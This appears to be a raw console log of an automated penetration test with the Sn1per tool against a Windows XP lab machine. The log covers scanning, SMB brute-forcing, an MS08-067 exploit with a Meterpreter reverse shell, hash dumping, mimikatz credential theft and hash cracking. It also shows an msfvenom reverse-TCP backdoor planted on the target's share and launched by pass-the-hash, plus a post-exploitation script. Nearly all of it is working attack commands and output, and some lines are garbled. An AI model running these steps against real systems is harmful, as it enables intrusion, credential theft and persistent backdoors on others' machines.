                          <|i::|i|`.
                        (` ^''`-' ')
 --------------------------------------------------------- 
 + -- --=[WARNING! Nuking ALL targets! 

                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 129.1.168.192.in-addr.arpa: NXDOMAIN

Host 129.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.129 (192.168.1.129) 56(84) bytes of data.
64 bytes from 192.168.1.129: icmp_seq=1 ttl=128 time=0.415 ms

--- 192.168.1.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.415/0.415/0.415/0.000 ms

################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:45 EST
Nmap scan report for 192.168.1.129
Host is up (0.00026s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows 98 netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp open  http          Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/1.0
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: TEST-3F6416AC49, NetBIOS user: < unknown>, NetBIOS MAC: 00:0c:29:fb:8c:7c (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: test-3f6416ac49
|   NetBIOS computer name: TEST-3F6416AC49
|   Domain name: xerosecurity.com
|   Forest name: xerosecurity.com
|   FQDN: test-3f6416ac49.xerosecurity.com
|_  System time: 2016-01-30T14:45:39-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.1.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:45 EST
Nmap scan report for 192.168.1.129
Host is up (0.00026s latency).
Not shown: 10 closed ports
PORT    STATE         SERVICE     VERSION
137/udp open          netbios-ns  Microsoft Windows NT netbios-ssn (workgroup: XEROSECURITY)
138/udp open|filtered netbios-dgm
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: TEST-3F6416AC49; OS: Windows NT; CPE: cpe:/o:microsoft:windows_nt

Host script results:
|_nbstat: NetBIOS name: TEST-3F6416AC49, NetBIOS user: < unknown>, NetBIOS MAC: 00:0c:29:fb:8c:7c (VMware)

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.1.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.66 seconds

################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 closed... skipping.
+ -- --=[Port 79 closed... skipping.
+ -- --=[Port 80 closed... skipping.
+ -- --=[Port 110 closed... skipping.
+ -- --=[Port 111 closed... skipping.
+ -- --=[Port 135 opened... running tests...
rpcinfo: can't contact portmapper: RPC: Remote system error - Connection refused

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:47 EST
Nmap scan report for 192.168.1.129
Host is up (0.00015s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
MAC Address: 00:0C:29:FB:8C:7C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
+ -- --=[Port 139 opened... running tests...
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 30 14:47:12 2016

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.129
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.129    |
 ===================================================== 
[+] Got domain/workgroup name: XEROSECURITY

 ============================================= 
|    Nbtstat Information for 192.168.1.129    |
 ============================================= 
Looking up status of 192.168.1.129
	TEST-3F6416AC49 <00> -         B   Workstation Service
	XEROSECURITY    <00> -  B   Domain/Workgroup Name
	TEST-3F6416AC49 <20> -         B   File Server Service
	XEROSECURITY    <1e> -  B   Browser Service Elections
	XEROSECURITY    <1d> -         B   Master Browser
	..__MSBROWSE__. <01> -  B   Master Browser

	MAC Address = 00-0C-29-FB-8C-7C

 ====================================== 
|    Session Check on 192.168.1.129    |
 ====================================== 
[+] Server 192.168.1.129 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.129    |
 ============================================ 
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain XEROSECURITY
error: NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.1.129    |
 ======================================= 
[+] Got OS info for 192.168.1.129 from smbclient: Domain=[XEROSECURITY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

 ============================== 
|    Users on 192.168.1.129    |
 ============================== 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================== 
|    Share Enumeration on 192.168.1.129    |
 ========================================== 
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 192.168.1.129

 ===================================================== 
|    Password Policy Information for 192.168.1.129    |
 ===================================================== 
[E] Unexpected error from polenum:

[+] Attaching to 192.168.1.129 using a NULL share

	[+] Trying protocol 445/SMB...

	[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

	[+] Trying protocol 139/SMB...

	[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[E] Failed to get password policy with rpcclient


 =============================== 
|    Groups on 192.168.1.129    |
 =============================== 

[+] Getting builtin groups:
[E] Can't get builtin groups: NT_STATUS_ACCESS_DENIED

[+] Getting builtin group memberships:

[+] Getting local groups:
[E] Can't get local groups: NT_STATUS_ACCESS_DENIED

[+] Getting local group memberships:

[+] Getting domain groups:
[E] Can't get domain groups: NT_STATUS_ACCESS_DENIED

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.1.129 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================== 
|    Getting printer info for 192.168.1.129    |
 ============================================== 
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain XEROSECURITY
error: NT_STATUS_ACCESS_DENIED


enum4linux complete on Sat Jan 30 14:47:13 2016

Traceback (most recent call last):
  File "bin/samrdump.py", line 159, in 
    logger.init()
AttributeError: 'module' object has no attribute 'init'
Doing NBT name scan for addresses from 192.168.1.129

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.1.129    TEST-3F6416AC49            00:0c:29:fb:8c:7c

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:47 EST
Nmap scan report for 192.168.1.129
Host is up (0.00020s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Microsoft Windows 98 netbios-ssn
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Service Info: OS: Windows 98; CPE: cpe:/o:microsoft:windows_98

Host script results:
| smb-brute: 
|   administrator:password => Valid credentials
|   guest: => Valid credentials
|_  test:password => Valid credentials
| smb-enum-groups: 
|   Builtin\Administrators (RID: 544): Administrator, test
|   Builtin\Users (RID: 545): test
|   Builtin\Guests (RID: 546): Guest
|   Builtin\Power Users (RID: 547): 
|   Builtin\Backup Operators (RID: 551): 
|   Builtin\Replicator (RID: 552): 
|   Builtin\Remote Desktop Users (RID: 555): 
|   Builtin\Network Configuration Operators (RID: 556): 
|_  TEST-3F6416AC49\HelpServicesGroup (RID: 1001): SUPPORT_388945a0
| smb-enum-sessions: 
|   Active SMB sessions
|     TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
|     TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
|     TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
|_    TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
| smb-enum-shares: 
|   account_used: test
|   ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
|     Anonymous access: 
|     Current user access: 
|   C: 
|     warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
|     Anonymous access: 
|     Current user access: READ/WRITE
|   C$: 
|     warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
|     Anonymous access: 
|     Current user access: 
|   Downloads: 
|     warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
|     Anonymous access: 
|     Current user access: READ/WRITE
|   IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
|     Type: Not a file share
|     Anonymous access: READ
|_    Current user access: READ/WRITE
|_smb-ls: ERROR: Script execution failed (use -d to debug)
| smb-mbenum: 
|   DFS Root
|     WIN-8MSB2DD52P9  6.3  
|   Domain Controller
|     WIN-8MSB2DD52P9  6.3  
|   Master Browser
|     TEST-3F6416AC49  5.1  
|   Potential Browser
|     TEST-3F6416AC49  5.1  
|   Server service
|     TEST-3F6416AC49  5.1  
|     WIN-8MSB2DD52P9  6.3  
|   Time Source
|     WIN-8MSB2DD52P9  6.3  
|   Windows NT/2000/XP/2003 server
|     TEST-3F6416AC49  5.1  
|     WIN-8MSB2DD52P9  6.3  
|   Workstation
|     TEST-3F6416AC49  5.1  
|_    WIN-8MSB2DD52P9  6.3  
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: test-3f6416ac49
|   NetBIOS computer name: TEST-3F6416AC49
|   Domain name: xerosecurity.com
|   Forest name: xerosecurity.com
|   FQDN: test-3f6416ac49.xerosecurity.com
|_  System time: 2016-01-30T14:47:42-05:00
|_smb-print-text: false
| smb-psexec: Can't find the service file: nmap_service.exe (or nmap_service).
| Due to false positives in antivirus software, this module is no
| longer included by default. Please download it from
| https://nmap.org/psexec/nmap_service.exe
|_and place it in nselib/data/psexec/ under the Nmap DATADIR.
| smb-security-mode: 
|   account_used: test
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-system-info: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smbv2-enabled: Server doesn't support SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.96 seconds
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1518 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

RHOSTS => 192.168.1.129
RHOST => 192.168.1.129
[*] 192.168.1.129 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \DAV RPC SERVICE, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \ntsvcs, \protected_storage, \router, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
192.168.1.129 - UUID f50aac00-c7f3-428e-a022-a6b71bfb9d43 1.0 OPEN VIA BROWSER
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[-] 192.168.1.129:139 - Login Failed: The SMB server did not reply to our request
[*] 192.168.1.129:445 - Windows XP Service Pack 2 (English)
[+] 192.168.1.129:445 - IPC$ - (IPC) Remote IPC
[+] 192.168.1.129:445 - C - (DISK) 
[+] 192.168.1.129:445 - Downloads - (DISK) 
[+] 192.168.1.129:445 - ADMIN$ - (DISK) Remote Admin
[+] 192.168.1.129:445 - C$ - (DISK) Default share
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129 TEST-3F6416AC49 [  ] 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Login Failed: The SMB server did not reply to our request
[*] 192.168.1.129 : XEROSECURITY\TEST-3F6416AC49$, XEROSECURITY\user
[+] 192.168.1.129 - Found user: XEROSECURITY\user
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129:445 SMB - Starting SMB login bruteforce
[*] 192.168.1.129 - This system allows guest sessions with any credentials
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129 PIPE(LSARPC) LOCAL(TEST-3F6416AC49 - 5-21-682003330-1606980848-839522115) DOMAIN(XEROSECURITY - 5-21-1088676282-494858925-2056655024)
[*] 192.168.1.129 USER=Administrator RID=500
[*] 192.168.1.129 USER=Guest RID=501
[*] 192.168.1.129 GROUP=None RID=513
[*] 192.168.1.129 USER=HelpAssistant RID=1000
[*] 192.168.1.129 TYPE=4 NAME=HelpServicesGroup rid=1001
[*] 192.168.1.129 USER=SUPPORT_388945a0 RID=1002
[*] 192.168.1.129 USER=test RID=1003
[*] 192.168.1.129 TEST-3F6416AC49 [Administrator, Guest, HelpAssistant, SUPPORT_388945a0, test ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129: - The target appears to be safe
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129:445 is running Windows XP SP2 (language:English) (name:TEST-3F6416AC49) (domain:XEROSECURITY)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Trying return address 0x081ed5f2...
[-] The SMB server did not reply to our request
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.129:1127) at 2016-01-30 14:49:30 -0500

    POST EXPLOITATION

    • meterpreter > hashdump
    Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345:::
test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
meterpreter > 
meterpreter >
    • meterpreter > getsystem
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > screenshot
Screenshot saved to: /mnt/sde1/pentest/web/Sn1per/VTpkjmPC.jpeg
meterpreter > shell
Process 1316 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> exit
    • meterpreter > use mimikatz
    Loading extension mimikatz...success.
    • meterpreter > kerberos
    [+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;151748  NTLM       XEROSECURITY  user           
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE     
0;55360   NTLM                                       
0;999     Negotiate  XEROSECURITY  TEST-3F6416AC49$  
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE   .mMS;.,)=B_>@:hk,eav(nDi)<-HrP*Ei?Z$M#fLACsTLYh<s'[email protected]"]vp,p0$w 61qu.w7xd04%`kjsuo9eo,;o`dxs?p="" 4bi="">vcobx*[email protected]+
    • meterpreter > livessp
    [+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;151748  NTLM       XEROSECURITY  user           n.a. (livessp KO)
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE     n.a. (livessp KO)
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE   n.a. (livessp KO)
0;55360   NTLM                                       n.a. (livessp KO)
0;999     Negotiate  XEROSECURITY  TEST-3F6416AC49$  n.a. (livessp KO)
    • meterpreter > msv
    [+] Running as SYSTEM
[*] Retrieving msv credentials
    • msv credentials
    ===============

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE   lm{ 00000000000000000000000000000000 }, ntlm{ a93c420761d5d783f1c3c674482e7d47 }
0;55360   NTLM                                       lm{ 00000000000000000000000000000000 }, ntlm{ a93c420761d5d783f1c3c674482e7d47 }
0;151748  NTLM       XEROSECURITY  user           lm{ e52cac67419a9a2217e4c3576fe93615 }, ntlm{ b490b475e987909ae9bd83a65aa94665 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE     n.s. (Credentials KO)
0;999     Negotiate  XEROSECURITY  TEST-3F6416AC49$  n.s. (Credentials KO)
    • meterpreter > ssp
    [+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============

AuthID  Package  Domain  User  Password
------  -------  ------  ----  --------
    • meterpreter > tspkg
    [+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;151748  NTLM       XEROSECURITY  user           n.a. (tspkg KO)
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE     n.a. (tspkg KO)
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE   n.a. (tspkg KO)
0;55360   NTLM                                       n.a. (tspkg KO)
0;999     Negotiate  XEROSECURITY  TEST-3F6416AC49$  n.a. (tspkg KO)

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;55360   NTLM                                       
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE     
0;999     Negotiate  XEROSECURITY  TEST-3F6416AC49$  .mMS;.,)=B_>@:hk,eav(nDi)<-HrP*Ei?Z$M#fLACsTLYh<s'[email protected]"]vp,p0$w 61qu.w7xd04%`kjsuo9eo,;o`dxs?p="" 4bi="">vcobx*[email protected]+
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE   .mMS;.,)=B_>@:hk,eav(nDi)<-HrP*Ei?Z$M#fLACsTLYh<s'[email protected]"]vp,p0$w 61qu.w7xd04%`kjsuo9eo,;o`dxs?p="" 4bi="">vcobx*[email protected]+
0;151748  NTLM       XEROSECURITY  user           Password123$



meterpreter > background
[*] Backgrounding session 1...
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(ms08_067_netapi) >

msf post(golden_ticket) > use post/windows/gather/cachedump 
msf post(cachedump) > show options

Module options (post/windows/gather/cachedump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
    • msf post(cachedump) > setg SESSION 1
    SESSION => 1
    • msf post(cachedump) > run
    [*] Executing module against TEST-3F6416AC49
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] XP or below system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE format. (mscash)
[*] MSCACHE v1 saved in: /root/.msf5/loot/20160130165258_default_192.168.1.129_mscache.creds_030856.txt
[*] John the Ripper format:
# mscash
user:M$user#c158f3e72ab78ed2adb9d0fab0e1ec23:xerosecurity.comn:XEROSECURITY

[*] Post module execution completed
    • msf post(cachedump) > cat /root/.msf5/loot/20160130165258_default_192.168.1.129_mscache.creds_030856.txt
    [*] exec: cat /root/.msf5/loot/20160130165258_default_192.168.1.129_mscache.creds_030856.txt

Username,Hash,Logon Domain Name,DNS Domain Name,Last Login,UPN,Effective Name,Full Name,Logon Script,Profile Path,Home Directory,HomeDir Drive,Primary Group,Additional Groups
"user","c158f3e72ab78ed2adb9d0fab0e1ec23","XEROSECURITY","xerosecurity.comn","2016-01-30 14:36:42","[email protected]","user","user","","","","","513","513"
</s'[email protected]"]vp,p0$w></s'[email protected]"]vp,p0$w></s'[email protected]"]vp,p0$w>

    CRACKING HASHES

    Initializing hashcat v2.00 with 8 threads and 32mb segment-size...

Added hashes from file /tmp/hashes2.txt: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 

Input.Mode: Dict (/pentest/lists/passwords/hashkiller.com.dic)
Index.....: 2/8 (segment), 3313392 (words), 33550341 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 43.01M plains, 43.01M words
Progress..: 3313392/3313392 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


c158f3e72ab78ed2adb9d0fab0e1ec23:user:Password123$
                                             
All hashes have been recovered

    MOUNTING CIFS

    AUTOEXEC.BAT  boot.ini    Documents and Settings  FL Studio VSTi (Multi).dll  MSDOS.SYS     ntldr         Program Files  System Volume Information
backdoor.exe  CONFIG.SYS  FL Studio VSTi.dll      IO.SYS                      NTDETECT.COM  pagefile.sys  RECYCLER       WINDOWS

    THE BACKDOOR

    • [email protected]:/mnt/winxp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=4444 -f exe > backdoor.exe
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
[email protected]:/mnt/winxp# ls -lh
total 773M
-rwxr-xr-x 1 root root    0 Nov  2 10:42 AUTOEXEC.BAT
-rwxr-xr-x 1 root root  73K Feb  1 07:36 backdoor.exe
-rwxr-xr-x 1 root root  211 Nov  2 10:38 boot.ini
-rwxr-xr-x 1 root root    0 Nov  2 10:42 CONFIG.SYS
drwxr-xr-x 2 root root    0 Jan 31 14:57 Documents and Settings
-rwxr-xr-x 1 root root 2.2M Jun 10  2014 FL Studio VSTi.dll
-rwxr-xr-x 1 root root 2.2M Jun 10  2014 FL Studio VSTi (Multi).dll
-r-xr-xr-x 1 root root    0 Nov  2 10:42 IO.SYS
-r-xr-xr-x 1 root root    0 Nov  2 10:42 MSDOS.SYS
-r-xr-xr-x 1 root root  47K Aug  4  2004 NTDETECT.COM
-r-xr-xr-x 1 root root 245K Aug  4  2004 ntldr
-rwxr-xr-x 1 root root 768M Jan 30 14:36 pagefile.sys
dr-xr-xr-x 2 root root    0 Dec 26 10:31 Program Files
drwxr-xr-x 2 root root    0 Jan 31 20:44 RECYCLER
drwxr-xr-x 2 root root    0 Nov  2 10:45 System Volume Information
drwxr-xr-x 2 root root    0 Jan 31 17:10 WINDOWS

POST EXPLOITATION

metasploit-windows-post.rc

setg SESSION 9
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
run
use post/windows/gather/enum_shares
run
use post/windows/gather/enum_patches
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/manage/enable_rdp
run
use post/windows/gather/enum_domain
run
use post/windows/gather/credentials/credential_collector
run
use post/windows/gather/enum_computers
run
use post/windows/gather/cachedump
run
use post/windows/gather/enum_ad_computers
run
  • [email protected]# pth-winexe -U XEROSECURITY/Administrator%Password123$ –system //192.168.1.129 “backdoor.exe”
msf post(enum_ad_computers) > 
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 9 opened (192.168.1.113:4444 -> 192.168.1.129:3643) at 2016-02-01 07:43:57 -0500

msf post(enum_ad_computers) >
  • msf post(enum_ad_computers) > resource /pentest/windows/metasploit-windows-post-exploitation-critical.rc
[*] Processing /pentest/windows/metasploit-windows-post-exploitation-critical.rc for ERB directives.
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> setg SESSION 9
SESSION => 9
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/smart_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run

[*] Running module against TEST-3F6416AC49
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf5/loot/20160201074415_default_192.168.1.129_windows.hashes_180907.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] 	Obtaining the boot key...
[*] 	Calculating the hboot key using SYSKEY 4479be5b4080a2c10a6095f17c263ff5...
[*] 	Obtaining the user list and keys...
[*] 	Decrypting user keys...
[*] 	Dumping password hints...
[*] 	No users with password hints on this system
[*] 	Dumping password hashes...
[+] 	Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[+] 	HelpAssistant:1000:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8:::
[+] 	SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345:::
[+] 	test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[+] 	test2:1004:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
[+] 	hacker:1005:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/domain_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[-] This does not appear to be an AD Domain Controller
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/mcafee_vse_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Looking for McAfee VSE password hashes on TEST-3F6416AC49 ...
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/mssql_local_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[-] Post failed: RuntimeError unknown: Unable to identify a SQL client
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/credentials/mssql_local_hashdump.rb:51:in `run'
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4479be5b4080a2c10a6095f17c263ff5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345:::
test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
test2:1004:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
